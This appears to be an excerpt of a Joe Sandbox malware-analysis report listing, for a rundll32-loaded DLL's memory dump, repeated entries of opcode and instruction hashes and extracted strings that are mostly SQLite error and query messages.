                                                                                                                                                                                                • Opcode Fuzzy Hash: b28334610613b286db38a69b1498e04b9d371b2a693c3fef70d5cbf47dc4e95d
                                                                                                                                                                                                • Instruction Fuzzy Hash: D5723621B0BA838AEB649B15A464B7933A6FF44B84F045135CA7E47BF8DF7CE8518340
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$API called with NULL prepared statement$API called with finalized prepared statement$misuse
                                                                                                                                                                                                • API String ID: 0-3582982771
                                                                                                                                                                                                • Opcode ID: ce4018d004635afde5cf612b25440c31076ef44a7df1ed41fa548c0b642c7786
                                                                                                                                                                                                • Instruction ID: df6074a3590e250ff2a86b73747266ae9ea41eb8f49514643bf885dcf42eb418
                                                                                                                                                                                                • Opcode Fuzzy Hash: ce4018d004635afde5cf612b25440c31076ef44a7df1ed41fa548c0b642c7786
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B627922B0AA878AEB548F15D8A4BB937AAFF44B84F054135DA7D477E8DF3CE4418740
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$API called with NULL prepared statement$API called with finalized prepared statement$misuse
                                                                                                                                                                                                • API String ID: 0-3582982771
                                                                                                                                                                                                • Opcode ID: f6b3c178814b3e5672fd58a04a7e832795e9016c5033ed7ff1800e17f272c363
                                                                                                                                                                                                • Instruction ID: d27a9a21b9581880c64189cdcad969b1442eae1c636099204779fbc4214edb5e
                                                                                                                                                                                                • Opcode Fuzzy Hash: f6b3c178814b3e5672fd58a04a7e832795e9016c5033ed7ff1800e17f272c363
                                                                                                                                                                                                • Instruction Fuzzy Hash: D0528C21B0BA4389EB649F259474BB927A2EF44B84F445131EE6E4BBFDDE7CE4418340
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s.%s$%s.rowid$5
                                                                                                                                                                                                • API String ID: 0-2959728198
                                                                                                                                                                                                • Opcode ID: 086b79955dbd11454436ad7cb0d8c8fdd6fc8f48a8c4425c116dc26d19d89b2b
                                                                                                                                                                                                • Instruction ID: 53633a916a04b000704384a1362a10dfca862695fd3f6c5ea99640d10320ac8e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 086b79955dbd11454436ad7cb0d8c8fdd6fc8f48a8c4425c116dc26d19d89b2b
                                                                                                                                                                                                • Instruction Fuzzy Hash: E2338072B196C28AEB60CF15D060BAE7BA1FB84B94F158135DA9E477ADDF39D440CB00
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: RECURSIVE STEP$SETUP$cannot use window functions in recursive queries$recursive aggregate queries not supported
                                                                                                                                                                                                • API String ID: 0-4261064685
                                                                                                                                                                                                • Opcode ID: 1ae00f54c2452060a6cdd9e895e7311e021842b58eef6f0d4b619e42330bc467
                                                                                                                                                                                                • Instruction ID: c13b18b4b3fb5e7dfebe3d965441aa7857999c09a5717fc853c8b2deae19d216
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ae00f54c2452060a6cdd9e895e7311e021842b58eef6f0d4b619e42330bc467
                                                                                                                                                                                                • Instruction Fuzzy Hash: 22326F72A09B828AD760DF25D450BAD7BB0F784F88F558235CA9E47BA9DF39D051CB00
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: -x0$0123456789ABCDEF0123456789abcdef$VUUU$VUUU
                                                                                                                                                                                                • API String ID: 0-2031831958
                                                                                                                                                                                                • Opcode ID: a68307dc4e82d48ed4c4f534f25c81175225768a23f26091d5da3ec9881dd088
                                                                                                                                                                                                • Instruction ID: 1b7021bc300909f9d79a13dcc3e5644648b1d05b5a5bf355fbde091354acccb6
                                                                                                                                                                                                • Opcode Fuzzy Hash: a68307dc4e82d48ed4c4f534f25c81175225768a23f26091d5da3ec9881dd088
                                                                                                                                                                                                • Instruction Fuzzy Hash: 20020422B0E68386EB64CB1594A4A7D7BA9FB49784F1D4035DA6E477F9DE3CE480C700
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$database corruption
                                                                                                                                                                                                • API String ID: 0-4001610065
                                                                                                                                                                                                • Opcode ID: a6abd02ad5e0a1b83cfa3ef008ef2f2ae175fd7a23f141b2b7e53e42b9fdd1f5
                                                                                                                                                                                                • Instruction ID: 8b9ba0fd09d0c56087a046a8bad27c49a27960f8c0feb90ae625c811df0b6e17
                                                                                                                                                                                                • Opcode Fuzzy Hash: a6abd02ad5e0a1b83cfa3ef008ef2f2ae175fd7a23f141b2b7e53e42b9fdd1f5
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6BE2A332B19692CAE750CF25D450AAD7BB1F784B88F118136EE5E53BA8DF38E545CB00
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: BBB$f$sqlite\_%
                                                                                                                                                                                                • API String ID: 0-4099593418
                                                                                                                                                                                                • Opcode ID: dbceca1ac09521060875d9155718efddc795ba8691d093c0b06f15726e8dcf01
                                                                                                                                                                                                • Instruction ID: 0a08f96e07d1504bdfcf5da3373a1d048552793e1a78d581164e7bf99269aade
                                                                                                                                                                                                • Opcode Fuzzy Hash: dbceca1ac09521060875d9155718efddc795ba8691d093c0b06f15726e8dcf01
                                                                                                                                                                                                • Instruction Fuzzy Hash: B7B27C72609A868ADB60DF05E490BAD7BA4F7C8F84F558235DB9E437A8DF38D445CB00
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: malformed JSON$null$string or blob too big
                                                                                                                                                                                                • API String ID: 0-759322337
                                                                                                                                                                                                • Opcode ID: 1507e62ab8e0ea9a5a2216e882ab8107304dd54103d4c524f1bc9e2a3dccaf2f
                                                                                                                                                                                                • Instruction ID: 5b73612385ad90fb631d751d8efe218f21d2a2058b46eabcdf8615cde11c1fc4
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1507e62ab8e0ea9a5a2216e882ab8107304dd54103d4c524f1bc9e2a3dccaf2f
                                                                                                                                                                                                • Instruction Fuzzy Hash: E7724D26F0AA4285FB10CB65D4A4BBD27A2AF45758F144236CE6D1BBEDDE79E005C340
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: USING INDEX %s FOR IN-OPERATOR$USING ROWID SEARCH ON TABLE %s FOR IN-OPERATOR$f
                                                                                                                                                                                                • API String ID: 0-872296338
                                                                                                                                                                                                • Opcode ID: 788ee33ec5ce138017216ac8b7e4bc0c801700c22262fcc75c91219f85bc8ad7
                                                                                                                                                                                                • Instruction ID: 1777b1fa3bbf5d590397886d0cd5719ea75f96d8f726c3a3506533d4edfdaab7
                                                                                                                                                                                                • Opcode Fuzzy Hash: 788ee33ec5ce138017216ac8b7e4bc0c801700c22262fcc75c91219f85bc8ad7
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B52EE72B0A68786EB608B15D061BBD77A1FB84B84F458132DEAD437E9EF38D641C710
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$database corruption
                                                                                                                                                                                                • API String ID: 0-4001610065
                                                                                                                                                                                                • Opcode ID: 1839563d8324d911c904a3c1144395b8bdc0345a41817bb47b604a5c17a10f4f
                                                                                                                                                                                                • Instruction ID: 19adaf045ea670ca87e8744eb762a6b4381d778696617d37b1989aea98d5b00f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1839563d8324d911c904a3c1144395b8bdc0345a41817bb47b604a5c17a10f4f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A428F32B0AB4386E750CF25D464B6937B9FB88B84F154032DE6D87BA9DF39E4858740
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: 5$7$row value misused
                                                                                                                                                                                                • API String ID: 0-355943616
                                                                                                                                                                                                • Opcode ID: 3d747acb97f916b3c14bb04a40449274205dd0918f1676c2037c097a09650a36
                                                                                                                                                                                                • Instruction ID: 58d082f656d1934c44ca1ab9c6641c3f26756aaec2abc2f83ad8e0816d24f471
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d747acb97f916b3c14bb04a40449274205dd0918f1676c2037c097a09650a36
                                                                                                                                                                                                • Instruction Fuzzy Hash: EA22DD72A09682CADB20CF15D450BBD7BA1F789B94F158136DB9E47BA9CF38E541CB00
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$database corruption
                                                                                                                                                                                                • API String ID: 0-4001610065
                                                                                                                                                                                                • Opcode ID: 6c603e39f9a3097107824c9f55f133f55402164eb61ae80f1fad4887f2c54ecc
                                                                                                                                                                                                • Instruction ID: 3d1eafeaaeb1409fcedaae8381d1d2a6e9bf5e0d4e366b942cf3dda74d72e2aa
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c603e39f9a3097107824c9f55f133f55402164eb61ae80f1fad4887f2c54ecc
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C02E072B0AB8386E3648F15E465ABA73A1FB44B84F518032DAAD477E8DF7CE444C740
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$database corruption
                                                                                                                                                                                                • API String ID: 0-4001610065
                                                                                                                                                                                                • Opcode ID: 6a07c762050a0bd0c9dafa72d53ca9078a01caa1fb245c3d44338a13c4930ebf
                                                                                                                                                                                                • Instruction ID: 22527e793f3c90e3b6aec066e9634745655553117699b5876d4391f62105f88a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a07c762050a0bd0c9dafa72d53ca9078a01caa1fb245c3d44338a13c4930ebf
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7791CE72B1978783D714AF26D5A096A73A1FB85B84F408035CF2D47BA9CF3AE555C700
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: BINARY$f
                                                                                                                                                                                                • API String ID: 0-3633891179
                                                                                                                                                                                                • Opcode ID: 96c0fec2a1a826bfe5deedcdc11cb00a3005dbadaa3c09ccc1ce74af67b67547
                                                                                                                                                                                                • Instruction ID: eca73ae6b154985191b53aec1238ba5e95f13831268cb245f522cd987aa14efe
                                                                                                                                                                                                • Opcode Fuzzy Hash: 96c0fec2a1a826bfe5deedcdc11cb00a3005dbadaa3c09ccc1ce74af67b67547
                                                                                                                                                                                                • Instruction Fuzzy Hash: FAB2CF72B1A68286EB648F19D460FBD7BA1FB84B84F019135CAAD437E9DF78E550C700
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExceptionRaise
